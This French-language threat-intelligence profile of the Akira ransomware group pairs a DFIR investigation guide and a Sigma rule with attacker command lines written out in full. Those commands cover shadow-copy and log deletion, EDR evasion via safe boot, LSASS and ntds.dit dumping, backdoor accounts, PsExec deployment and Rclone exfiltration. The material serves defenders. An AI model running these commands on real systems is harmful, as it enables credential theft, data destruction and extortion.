Aller au contenu

Profil de menace : syndicat ransomware Akira et guide d'investigation DFIR de référence

HTS

HERMES THREAT SCORE & EXPLOITABILITÉ OPÉRATIONNELLE

Cible : Infrastructures d'Entreprise, Active Directory Windows & Hyperviseurs VMware ESXi
Confiance : 99%
94 / 100
EXTRÊME

Mesure la pertinence opérationnelle réelle, la militarisation de l'exploit et la posture de menace active.

Décomposition des dimensions
Exploitabilité 20 / 20
Activité de menace 20 / 20
Militarisation 15 / 20
Exposition 15 / 20
Prévalence 14 / 20
Impact 10 / 20
⚖️ Divergence & Justification opérationnelle

Évalué à 94 EXTREME par Hermes en raison de son rythme opérationnel soutenu, de l'armement systématique de failles sur les passerelles de périmètre (SonicWall, Cisco), de la destruction ciblée d'hyperviseurs (VMware ESXi, Nutanix AHV), de l'évasion au niveau noyau par pilotes vulnérables (BYOVD) et d'une double extorsion implacable.

🕸️ Graphe de connaissances connecté & Provenance

Akira Ransomware SyndicateACTEUR DE MENACE

Nœuds connectés : 0

1. Profil de l’acteur de la menace, origines et filiation avec Conti

Section intitulée « 1. Profil de l’acteur de la menace, origines et filiation avec Conti »

Akira a émergé en mars 2023, comblant rapidement le vide opérationnel créé par la dissolution des cartels Conti et Hive. Fonctionnant selon un modèle d’affiliation, l’équipe centrale de développeurs fournit le portail de négociation, les rançongiciels multi-plateformes, l’infrastructure de publication de données et la chaîne d’outils d’exfiltration, tandis que des affiliés spécialisés réalisent la pénétration du réseau, l’élévation de privilèges et le déplacement latéral.

Les demandes de rançon varient de 200 000 à plus de 10 000 000 USD en Monero (XMR) et Bitcoin (BTC), calibrées en fonction du chiffre d’affaires annuel de la victime déduit des bilans financiers dérobés lors de l’exfiltration.

Filiation et Infrastructure du Syndicat Akira :
┌─────────────────────────────────────────────────────────────┐
│ Fragmentation du Cartel Conti (Mai 2022) │
│ - Code source de Conti v2 divulgué │
│ - Algorithmes partagés ChaCha20/RSA et logique d'injection │
└──────────────────────────────┬──────────────────────────────┘
│
▼
┌─────────────────────────────────────────────────────────────┐
│ Émergence d'Akira (Mars 2023 - Présent) │
│ ├── Chiffreur Windows (C++ / Multi-threadé) │
│ ├── Chiffreur Linux / VMware ESXi (ELF64 / Threads POSIX) │
│ ├── Variante « Megazord » (Rust / Chargeurs PowerShell) │
│ └── Module pour Nutanix AHV (Fin 2025/2026) │
└──────────────────────────────┬──────────────────────────────┘
│
┌──────────────────────────┴──────────────────────────┐
▼ ▼
┌──────────────────────────────┐ ┌─────────────────────────────────────┐
│ Portail Tor Rétro Années 80 │ │ Référentiel de Fuite (Double Ext.) │
│ - Chat de négociation dédié │ │ - Dépôts Mega.nz, Wasabi, pCloud │
│ - Portefeuilles partagés │ │ - Ventes aux enchères publiques │
└──────────────────────────────┘ └─────────────────────────────────────┘

La décompilation approfondie des binaires réalisée par les laboratoires d’Arctic Wolf, Sophos X-Ops et la CISA (avis AA24-109A) confirme la réutilisation directe du code source de Conti v2 :

  1. Identité de la couche cryptographique : la dérivation de clé ChaCha20, la génération du vecteur d’initialisation (IV) via l’API CryptoAPI et l’encapsulation RSA reproduisent les routines de Conti au niveau de l’octet.
  2. Obscurcissement de chaînes et hachage d’API : Akira emploie les mêmes algorithmes d’assemblage de chaînes sur la pile et de résolution dynamique d’API Windows (VirtualAlloc, CreateFileW, CryptAcquireContextW), masquant ainsi sa table des importations (IAT).
  3. Agrégat de portefeuilles blockchain : les flux de traçage de cryptomonnaies montrent des adresses de portefeuilles et des nœuds de mixage communs entre les rançons historiques de Conti et les premiers paiements perçus par Akira.

2. Cycle de vie MITRE ATT&CK complet et TTPs détaillées

Section intitulée « 2. Cycle de vie MITRE ATT&CK complet et TTPs détaillées »

Une intrusion menée par Akira obéit à une séquence d’actions rigoureusement planifiée :

Chaîne d'Attaque Bout en Bout d'Akira :
[1. Accès Initial] ──► Exploitation Cisco ASA (CVE-2023-20269) ou SonicWall (CVE-2024-40766 / CVE-2026-83548)
│
[2. Vivre sur l'Herbe] ──► Déploiement AnyDesk / RustDesk / Ngrok ; audit AD avec AdFind & SharpHound
│
[3. Élévation de Priv.]──► Chargeur POORTRY / Pilote vulnérable BYOVD (zam.sys) pour tuer les capteurs EDR
│
[4. Vol d'Identifiants]──► Vidage de LSASS (Mimikatz / ProcDump) ; extraction de NTDS.dit via ntdsutil
│
[5. Déplacement Lat.] ──► Rebond RDP (mstsc), WMI et PsExec vers les contrôleurs de domaine et nœuds ESXi
│
[6. Exfiltration] ──► Archivage 7-Zip ; exfiltration furtive via Rclone masqué vers Mega.nz/Wasabi
│
[7. Impact / Chiffre] ──► Arrêt des VM (esxcli/vim-cmd) ; suppression des ombres ; chiffreur ChaCha20/RSA

Le groupe contourne généralement l’hameçonnage classique pour frapper directement le périmètre externe :

  • Vulnérabilités d’équipements Cisco ASA / FTD : exploitation intensive de la faille CVE-2023-20269 permettant le bourrage d’identifiants et le contournement de l’authentification multifacteur sur les passerelles VPN.
  • Compromission de passerelles SonicWall : exploitation massive des failles CVE-2024-40766 et CVE-2026-83548 (SSRF et injection de commandes sur SonicWall SMA1000) pour s’infiltrer et dérober les comptes de synchronisation Active Directory LDAP.
  • Failles de VPN SSL Fortinet FortiOS : utilisation des failles CVE-2026-22708 et CVE-2024-21762 pour exécuter du code à distance sur le concentrateur de télétravail.
  • Ciblage de l’infrastructure de sauvegarde Veeam : exploitation de CVE-2023-27532 et CVE-2024-40711 afin d’anéantir les sauvegardes avant le déclenchement du chiffreur.
  • Achat d’accès auprès des courtiers (IAB) : achat de jetons de session et de sessions RDP volées auprès des courtiers d’accès initial (IAB).

Dès l’accès interne validé, les opérateurs lancent une cartographie automatisée du domaine :

  • Interrogation de l’annuaire avec AdFind :
    Fenêtre de terminal
    adfind.exe -f "(objectcategory=person)" > users.txt
    adfind.exe -f "(objectcategory=computer)" > computers.txt
    adfind.exe -f "(objectcategory=group)" > groups.txt
    adfind.exe -gcb -sc trustdmp > trust_topology.txt
  • Analyse de chemins avec BloodHound : exécution de SharpHound.exe pour tracer le chemin d’attaque le plus court vers le groupe Administrateurs du Domaine.
  • Scanners de sous-réseaux : emploi de Advanced_IP_Scanner.exe, netscan.exe (SoftPerfect) et Angry IP Scanner pour localiser les serveurs de bases de données, les partages de fichiers et les interfaces de gestion VMware ESXi.
  • Commandes système natives (living-off-the-land) :
    Fenêtre de terminal
    net view /all /domain
    nltest /dclist:ENTREPRISE
    net group "Domain Admins" /domain
    wmic computersystem get domain,name,username

Persistance et commande-et-contrôle (TA0003 & TA0011)

Section intitulée « Persistance et commande-et-contrôle (TA0003 & TA0011) »

Pour éviter les détections de balisage réseau (beaconing), Akira privilégie des logiciels d’administration légitimes :

  • Outils de télégestion (RMM) :
    • AnyDesk : déployé silencieusement en ligne de commande (AnyDesk.exe --install "C:\Program Files (x86)\AnyDesk" --start-with-win --silent) avec mot de passe d’accès autonome préconfiguré dans service.conf.
    • RustDesk et splashtop : déployés en relais de secours.
  • Tunnels et relais inversés :
    • Ngrok : exposition du port RDP 3389 sur Internet via un tunnel sortant (ngrok.exe tcp 3389).
    • Cloudflare tunnels (cloudflared.exe) et Chisel : Évasion des pare-feux d’inspection de trafic.
  • Création de comptes locaux clandestins :
    Fenêtre de terminal
    net user backup_admin P@ssw0rd2026! /add
    net localgroup Administrators backup_admin /add
    net localgroup "Remote Desktop Users" backup_admin /add

Élévation de privilèges et évasion de défense (TA0004 & TA0005)

Section intitulée « Élévation de privilèges et évasion de défense (TA0004 & TA0005) »

Utilisation de pilotes vulnérables (BYOVD) via POORTRY

Section intitulée « Utilisation de pilotes vulnérables (BYOVD) via POORTRY »

Les affiliés d’Akira exploitent le chargeur POORTRY pour installer des pilotes en mode noyau signés mais vulnérables (zam.sys de Zemana, gdrv.sys de GIGABYTE ou procexp.sys) :

  1. Enregistrement d’un service noyau : sc create zam_driver type= kernel binPath= C:\Windows\Temp\zam.sys.
  2. Le pilote expose des fonctions de lecture/écriture arbitraires en mémoire noyau via des appels IOCTL.
  3. Exécuté en ring 0, POORTRY parcourt la liste des processus EPROCESS et termine sans sommation les processus et pilotes de filtrage des agents EDR (CrowdStrike, SentinelOne, Defender for Endpoint, Sophos, Trend Micro).

Pour neutraliser les solutions de sécurité résistant au meurtre en espace utilisateur, Akira reconfigure Windows afin de démarrer en mode sans échec avec prise en charge réseau :

Fenêtre de terminal
bcdedit /set {current} safeboot network
shutdown /r /f /t 00

La majorité des capteurs EDR n’ayant pas leurs services configurés pour s’exécuter dans cette configuration (HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network), le rançongiciel dispose du champ libre.

Destruction des sauvegardes, neutralisation de Veeam et purge des journaux

Section intitulée « Destruction des sauvegardes, neutralisation de Veeam et purge des journaux »
Fenêtre de terminal
:: Suppression des clichés instantanés de volume (VSS)
vssadmin.exe delete shadows /all /quiet
wmic shadowcopy delete
:: Suppression du catalogue de sauvegarde Windows
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup -keepVersions:0
:: Désactivation de l'environnement de récupération et de la réparation automatique
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
:: Purge des journaux d'événements Windows
wevtutil cl Security
wevtutil cl System
wevtutil cl Application
wevtutil cl "Windows PowerShell"
wevtutil cl "Microsoft-Windows-Sysmon/Operational"

Lors des intrusions d’entreprise, les opérateurs d’Akira s’attaquent spécifiquement aux serveurs Veeam Backup & Replication (en exploitant les vulnérabilités CVE-2023-27532 et CVE-2024-40711) afin de dérober les mots de passe des hyperviseurs et d’ordonner la purge complète des dépôts (Remove-VBRBackup -FromDisk) avant de déployer leur chiffreur Linux ESXi. Pour une analyse approfondie de ce vecteur, consultez notre dossier sur l’Architecture et paysage des menaces Veeam.

Accès aux identifiants et mouvement latéral (TA0006 & TA0008)

Section intitulée « Accès aux identifiants et mouvement latéral (TA0006 & TA0008) »
  • Vidage de la mémoire LSASS :
    • Exécution de Mimikatz (sekurlsa::logonpasswords).
    • Vidage discret via ProcDump de Sysinternals : procdump.exe -ma lsass.exe C:\Windows\Temp\lsass.dmp.
    • Appel direct de l’API comsvcs.dll :
      Fenêtre de terminal
      rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <PID_LSASS> C:\Windows\Temp\lsass.dmp full
  • Extraction de la base Active Directory ntds.dit :
    Fenêtre de terminal
    ntdsutil "ac i ntds" "ifm" "create full C:\Windows\Temp\ntds_dump" q q
  • Attaques Kerberoasting et AS-REP Roasting : sollicitation des tickets TGS des comptes de service via Rubeus.exe pour les casser hors-ligne.
  • Progression latérale :
    • Protocole RDP : rebond interactif via mstsc.exe (Événement Windows 4624, Logon Type 10).
    • PsExec et appels WMI : déploiement et exécution de la charge utile sur l’ensemble des postes et serveurs du domaine :
      Fenêtre de terminal
      psexec.exe \\<IP_CIBLE> -u <DOMAINE>\<ADMIN> -p <MOT_DE_PASSE> -d -c C:\Windows\Temp\akira.exe -s 100
      wmic /node:<IP_CIBLE> /user:<ADMIN> /password:<MOT_DE_PASSE> process call create "cmd.exe /c C:\Windows\Temp\akira.exe"

Collecte et exfiltration pour double extorsion (TA0009 & TA0010)

Section intitulée « Collecte et exfiltration pour double extorsion (TA0009 & TA0010) »
  • Préparation des archives : compression avec WinRAR ou 7-Zip, avec chiffrement des archives pour tromper les capteurs DLP :
    Fenêtre de terminal
    rar.exe a -hpP@ssw0rd123 -m1 -r C:\Windows\Temp\exfil_finance.rar "D:\Finance\*"
  • Outil d’exfiltration Rclone : Akira emploie systématiquement Rclone, fréquemment renommé pour usurper des binaires système :
    • Chemins observés : C:\Windows\Temp\svchost.exe, C:\ProgramData\system.exe, C:\Users\Public\taskhost.exe.
    • Exécution avec un fichier de configuration dédié (rclone.conf) pointant vers des espaces cloud :
      Fenêtre de terminal
      svchost.exe copy "D:\DonneesEntreprise" "remote:bucket_exfil" --transfers 16 --checkers 16 --no-check-certificate --config C:\Windows\Temp\rclone.conf
    • Cibles d’hébergement : Mega.nz, Wasabi Cloud Storage, pCloud et serveurs SFTP dédiés.

3. Anatomie du moteur cryptographique et rétro-ingénierie

Section intitulée « 3. Anatomie du moteur cryptographique et rétro-ingénierie »

Akira dispose de deux variantes de chiffreur : un binaire en C++ pour Windows et un binaire ELF 64 bits pour les hyperviseurs Linux et VMware ESXi.

Pipeline Cryptographique d'Akira & Chiffrement Intermittent :
Évaluation de la Taille du Fichier :
┌─────────────────────────────────────────────────────────────┐
│ Contrôle de la taille et de l'extension (.akira ajouté) │
└──────────────────────────────┬──────────────────────────────┘
│
┌────────────────────────┼────────────────────────┐
▼ ▼ ▼
Taille < 2 Mo 2 Mo <= Taille <= 100 Mo Taille > 100 Mo
┌──────────────────┐ ┌─────────────────────────┐ ┌─────────────────────────┐
│ Chiffrement Total│ │ Chiffrement par Étapes │ │ Chiffrement des En-têtes│
│ 100% des octets │ │ Chiffre 1 bloc, saute N │ │ Chiffre les premiers │
│ chiffrés avec le │ │ blocs selon le flag -n %│ │ blocs et quelques Mo │
│ flux ChaCha20 │ │ (Par défaut : 50%) │ │ de structures VMFS/NTFS │
└──────────────────┘ └─────────────────────────┘ └─────────────────────────┘
│ │ │
└────────────────────────┼────────────────────────┘
│
▼
┌─────────────────────────────────────────────────────────────┐
│ Écriture du Pied de Page (Footer) en Fin de Fichier : │
│ 1. Clé ChaCha20 (256 bits) et Nonce (96 bits) │
│ 2. Encapsulés avec la Clé Publique RSA-4096 des attaquants │
│ 3. Signature Magique : 0x24 0x61 0x6B 0x69 ("$aki") │
└─────────────────────────────────────────────────────────────┘
  • Chiffrement symétrique (ChaCha20) : contrairement aux rançongiciels historiques utilisant AES, Akira utilise le chiffreur de flux ChaCha20, offrant une vélocité de chiffrement supérieure sans dépendre des instructions matérielles AES-NI. Chaque fichier reçoit une clé symétrique unique de 256 bits et un nonce de 96 bits générés via CryptGenRandom.
  • Protection asymétrique (RSA-4096) : la clé symétrique et le nonce sont immédiatement encapsulés à l’aide d’une clé publique RSA-4096 intégrée dans le code du binaire.
  • Structure du pied de page (footer) : les métadonnées chiffrées sont écrites à la fin du fichier, suivies d’une marque magique de 4 octets (0x24 0x61 0x6B 0x69, chaîne "$aki"). Sans la clé privée détenue par les attaquants, le déchiffrement mathématique est impossible.

Afin de déjouer les heuristiques de détection de comportement d’E/S disque des EDR, Akira implémente un chiffrement intermittent réglable :

  • Fichiers inférieurs à 2 mo : chiffrement intégral.
  • Fichiers entre 2 mo et 100 mo : chiffrement d’un bloc sur deux en fonction de l’argument -n (ex. -n 50 chiffre 50 % des blocs).
  • Fichiers volumineux et disques virtuels (> 100 mo) : chiffrement des premiers mégaoctets et de quelques blocs intermittents. Cette approche corrompt instantanément les systèmes de fichiers (NTFS, VMFS) et les bases de données tout en réduisant le temps d’exécution à quelques secondes par téraoctet.
ArgumentWindowsLinux / ESXiRôle opérationnel et mécanique
-p <chemin>OuiOuiCible un dossier précis, un fichier ou une banque de données VMFS (ex. -p /vmfs/volumes/Datastore1/).
-sNonOuiArrêt des machines virtuelles : Invoque esxcli et vim-cmd pour forcer l’extinction des machines virtuelles avant chiffrement.
-n <pourcent>OuiOuiRatio de chiffrement : Pourcentage de blocs chiffrés par fichier (ex. -n 50).
-fork <nb>OuiOuiParallélisation : Nombre de threads ou de sous-processus alloués au chiffrement simultané.
-share <nom>OuiNonCible un partage réseau SMB spécifique du domaine.

4. Spécificités de la charge utile Linux et VMware ESXi

Section intitulée « 4. Spécificités de la charge utile Linux et VMware ESXi »

Le binaire Linux est un exécutable ELF 64 bits. Déployé sur les hyperviseurs ESXi via SSH ou vCenter :

  1. Énumération des machines virtuelles :
    Fenêtre de terminal
    vim-cmd vmsvc/getallvms | awk '{print $1}'
  2. Arrêt forcé des processus : Pour libérer les verrous sur les fichiers de disques virtuels :
    Fenêtre de terminal
    vim-cmd vmsvc/power.off <ID_VM>
    esxcli vm process kill --type=force --world-id=<WORLD_ID>
  3. Chiffrement des banques de données (/vmfs/volumes/) : Ciblage spécifique des extensions :
    • .vmdk (disque virtuel)
    • .vmem (fichier de pagination mémoire)
    • .vmx / .vmxf (configuration de la machine virtuelle)
    • .vmsn / .vmsd (instantanés/snapshots)
    • .nvram (BIOS/UEFI virtuel)
  4. Renommage et dépôt de la note : Les fichiers reçoivent l’extension .akira et la note akira_readme.txt est déposée à la racine de chaque banque de données.

4. Campagnes réelles à fort impact et télémétrie des attaques

Section intitulée « 4. Campagnes réelles à fort impact et télémétrie des attaques »

1. Attaque des centres de données de tietoevry (janvier 2024)

Section intitulée « 1. Attaque des centres de données de tietoevry (janvier 2024) »
  • Cible : tietoevry, géant nordique des services d’hébergement cloud en Suède et Finlande.
  • Vecteur : compromission d’équipements de virtualisation et de passerelles de périmètre.
  • Conséquences : chiffrement de grappes complètes de serveurs, entraînant l’interruption des services de l’agence suédoise de l’emploi, du système fiscal, de pharmacies hospitalières et de plus de 120 portails municipaux.
  • Cible : filiale régionale de Nissan Motor Corporation en Australie et Nouvelle-Zélande.
  • Conséquences : pénétration via un accès VPN sans MFA, vol de plus de 100 gigaoctets de données et chiffrement des serveurs. Les données personnelles et financières de plus de 100 000 individus ont été publiées sur le site Tor du groupe.

3. Campagnes massives sur VPN SonicWall (2024 – 2026)

Section intitulée « 3. Campagnes massives sur VPN SonicWall (2024 – 2026) »
  • Télémétrie : les équipes DFIR ont documenté une exploitation massive des failles CVE-2024-40766 et CVE-2026-83548, avec un temps de séjour (dwell time) moyen inférieur à 36 heures entre l’accès initial et le chiffrement généralisé.

5. Guide d’investigation DFIR pour les analystes de réponse à incident

Section intitulée « 5. Guide d’investigation DFIR pour les analystes de réponse à incident »

Face à une attaque suspectée d’Akira, l’équipe d’intervention doit suivre une méthodologie d’investigation stricte :

  1. Confinement d’urgence et coupure du périmètre :

    • Déconnecter immédiatement l’ensemble des accès VPN externes (SonicWall, Cisco, Fortinet).
    • Couper les flux sortants vers Internet pour bloquer les transferts Rclone en cours.
    • Isoler les interfaces réseau des hôtes VMware ESXi et vCenter pour empêcher la destruction des VM.
    • Procéder à une double réinitialisation du mot de passe KRBTGT sur l’Active Directory pour invalider tous les tickets Kerberos forgés.
  2. Préservation de la mémoire vive (fenêtre cryptographique cruciale) :

    • Ne jamais redémarrer OU éteindre précipitamment les serveurs chiffrés.
    • Si un serveur est en cours de chiffrement, capturer la mémoire vive (WinPmem, DumpIt, capture de snapshot hyperviseur). Les clés de sous-flux ChaCha20 résidant temporairement en RAM, cette capture peut permettre la récupération des données.
  3. Analyse des journaux d’accès périmétriques :

    • Extraire et auditer les logs VPN Cisco ASA (%ASA-6-113019), SonicWall et Fortinet.
    • Identifier les adresses IP sources anormales, les sessions sans MFA et les anomalies de voyage impossible (impossible travel).
  4. Traque des artefacts forensiques sur les postes et serveurs :

  5. Investigation sur les hyperviseurs VMware ESXi :

    • Se connecter directement via la console physique ou IPMI/iLO.
    • Examiner /var/log/shell.log et /var/log/auth.log pour repérer les sessions SSH illégitimes et /var/log/vmkernel.log pour les arrêts forcés de machines virtuelles.

Matrice des artefacts forensiques Windows critiques

Section intitulée « Matrice des artefacts forensiques Windows critiques »
Emplacement de l’artefactComposant systèmeRôle dans l’enquête Akira
C:\Windows\Prefetch\*.pfGestionnaire mémoireProuve l’exécution, l’horodatage, le compteur et les DLL associées à RCLONE.EXE, ANYDESK.EXE, MIMIKATZ.EXE et AKIRA.EXE.
C:\Windows\appcompat\Programs\Amcache.hveCompatibilité applicativeEnregistre l’empreinte SHA-1, la date de compilation et le chemin complet des exécutables d’attaque.
SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCacheRegistre (Shimcache)Atteste de la présence passée et du chemin de scripts malveillants même s’ils ont été supprimés du disque.
C:\Windows\System32\sru\SRUDB.datBase de données SRUMPreuve formelle d’exfiltration : Mesure avec exactitude les octets émis par application, démontrant si un faux svchost.exe a envoyé des gigaoctets vers l’extérieur.
C:\Users\<USER>\AppData\Roaming\AnyDesk\Journaux AnyDeskContient connection_trace.txt et ad.trace avec les identifiants distants des attaquants, la durée des sessions et les transferts de presse-papiers.
C:\Windows\Temp\rclone.confConfiguration RcloneDévoile les noms des buckets cloud, clés d’accès et hébergeurs distants utilisés pour l’exfiltration.

6. Suite d’ingénierie de la détection et traque des menaces

Section intitulée « 6. Suite d’ingénierie de la détection et traque des menaces »
title: Exécution du rançongiciel Akira et destruction des sauvegardes
id: 3c8e9b41-1192-4f8a-9214-akira001-fr
status: stable
description: Détecte les exécutions caractéristiques d'Akira incluant la suppression des clichés instantanés, la désactivation de la récupération et les drapeaux de commande typiques.
author: Hermes Codex CTI
date: 2026-09-08
references:
- Avis CISA AA24-109A
tags:
- attack.impact
- attack.t1486
- attack.t1490
- attack.defense_evasion
- attack.t1070.001
logsource:
category: process_creation
product: windows
detection:
selection_shadows:
CommandLine|contains|all:
- 'vssadmin'
- 'delete'
- 'shadows'
selection_wmic:
CommandLine|contains|all:
- 'wmic'
- 'shadowcopy'
- 'delete'
selection_bcdedit:
CommandLine|contains|all:
- 'bcdedit'
- 'bootstatuspolicy'
- 'ignoreallfailures'
selection_akira_flags:
CommandLine|contains:
- ' -n '
- ' -s '
- ' -fork '
- ' -share '
selection_wevtutil:
CommandLine|contains|all:
- 'wevtutil'
- 'cl'
- 'Security'
condition: 1 of selection_*
falsepositives:
- Tests exceptionnels de reprise d'activité (valider le compte utilisateur et le ticket de changement).
level: critical

7. Liens croisés : écosystème de menaces et matrice d’investigation

Section intitulée « 7. Liens croisés : écosystème de menaces et matrice d’investigation »
Dimension d’investigationDossier Codex / OutilSynergies DFIR
Playbook d’incidentPlaybook d’investigation de ransomwareMéthodologie complète de confinement, d’acquisition de mémoire et de reconstruction de parc.
Mouvement latéralMouvement latéral : SMB vs RDPTraque des rebonds réseau, corrélation des événements 4624 Type 10 / Type 3 et traces PsExec.
Vol d’identifiantsAttaques sur identifiants Active DirectoryInvestigation sur les vidages de LSASS, le Kerberoasting et l’extraction de NTDS.dit.
Failles de passerellesCVE-2026-83548 : SSRF SonicWall SMA1000Analyse technique de la vulnérabilité de passerelle prioritairement ciblée par les affiliés d’Akira.
Failles de passerellesCVE-2026-22708 : RCE Fortinet FortiOSMécanisme d’exploitation des failles de périmètre exploitées pour l’accès initial en entreprise.
Profil de menaceCourtiers d’accès initial (IAB)Compréhension des places de marché souterraines fournissant les accès VPN aux affiliés.
Neutralisation de sauvegardeArchitecture et paysage des menaces VeeamAnalyse détaillée de la militarisation des failles Veeam par Akira et des procédures d’effacement de dépôts.
Ransomware homologueRansomware QilinComparaison opérationnelle avec Qilin, autre acteur ciblant agressivement les hyperviseurs.
Studio interactifAgentThreat StudioModélisation des périmètres réseau et simulation des scénarios de compromission d’infrastructure.

Sources et références techniques à haute fiabilité

Section intitulée « Sources et références techniques à haute fiabilité »